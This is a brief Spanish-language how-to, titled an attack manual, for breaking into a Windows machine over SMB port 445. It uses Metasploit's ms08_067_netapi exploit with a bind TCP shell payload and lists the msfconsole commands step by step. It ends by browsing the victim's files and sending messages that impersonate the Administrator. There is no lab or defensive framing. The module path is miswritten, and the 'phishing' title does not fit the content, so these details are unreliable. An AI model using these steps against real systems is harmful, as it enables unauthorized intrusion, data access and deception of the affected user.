Manual de Ataque sobre Acceso a un Sistema (phihing)

Pasos:

1. En primer lugar miramos si el equipo responde, hacemos un ping a la máquina.

response

2. Escaneamos y vemos los puertos que estén abiertos, en este caso el 445 está habilitado y para esta vulnerabilidad es el ms08_067_netapi. Y pasamos a configurar el metasploit.

3. Para abrir el Metasploit ejecutamos el comando msfconsole.

4. En la consola ejecutamos la vulnerabilidad de Windows use window/smb/ms08_067_netapi 

5. Mostramos las opciones que esten configuradas en ese momento
        show options

Options

6. Entonces procedemos a asignarle RHOST (dirección IP de la máquina que se va a atacar) y se define por defecto el puerto vulnerable.
        set RHOST direccion_ip_del_atacado

 7. Luego asignamos el payload
 set payload windows/shell/bind_tcp

8. Revisamos las opciones
 show options

 
9. Le asignamos también LHOST nuestra dirección IP del backtrack
        set LHOST dirección_ip_del_backtrack

10. Una vez configurado todo eso ejecutamos el exploit para acceder al sistema.

ejecutar exploit

11. Una vez ejecutado el exploit ya estamos dentro del cmd de windows y podemos navegar por los archivos y discos de la máquina, le podemos enviar mensajes; y el usuario atacado va a creer que es el Administrador el que le envíe el mensaje.
Además la puerta de enlace del windows será la del backtrack, y el usuario creerá que éste es realmente el servidor que le proporciona internet.

exito o intrusión 

Gracias.